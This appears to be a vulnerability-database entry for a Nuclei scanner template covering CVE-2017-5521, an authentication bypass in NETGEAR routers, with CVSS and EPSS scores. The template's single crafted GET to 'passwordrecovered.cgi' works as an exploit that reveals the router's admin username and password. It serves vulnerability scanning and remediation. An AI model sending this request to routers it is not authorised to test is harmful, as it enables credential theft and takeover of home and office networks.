Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2017-5521
HistoryApr 13, 2021 - 7:54 p.m.

NETGEAR Routers - Authentication Bypass

2021-04-1319:54:49
ProjectDiscovery
github.com
7
cve
2017
authentication
bypass
netgear
router

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:N/A:N

CVSS3

8.1

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

8.3

Confidence

High

EPSS

0.973

Percentile

99.9%

NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices are susceptible to authentication bypass via simple crafted requests to the web management server.
id: CVE-2017-5521

info:
  name: NETGEAR Routers - Authentication Bypass
  author: princechaddha
  severity: high
  description: |
    NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices are susceptible to authentication bypass via simple crafted requests to the web management server.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized configuration changes, network compromise, and potential exposure of sensitive information.
  remediation: |
    Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability.
  reference:
    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/
    - http://kb.netgear.com/30632/Web-GUI-Password-Recovery-and-Exposure-Security-Vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2017-5521
    - https://www.exploit-db.com/exploits/41205/
    - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2017-5521
    cwe-id: CWE-200
    epss-score: 0.97402
    epss-percentile: 0.99921
    cpe: cpe:2.3:o:netgear:r6200_firmware:1.0.1.56_1.0.43:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: netgear
    product: r6200_firmware
  tags: cve,cve2017,auth-bypass,netgear,router,kev

http:
  - method: GET
    path:
      - "{{BaseURL}}/passwordrecovered.cgi?id={{rand_base(5)}}"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "right\">Router\\s*Admin\\s*Username<"
          - "right\">Router\\s*Admin\\s*Password<"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022059065c5c9ba92a40e10293914467e7965bbb2954d0bb893d401c3154c1d6eb5d022100b85fa32ba119c6b5a80ed29385a4e05c8c072b17d9dd11e9812bd4a8974b0953:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:N/A:N

CVSS3

8.1

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

8.3

Confidence

High

EPSS

0.973

Percentile

99.9%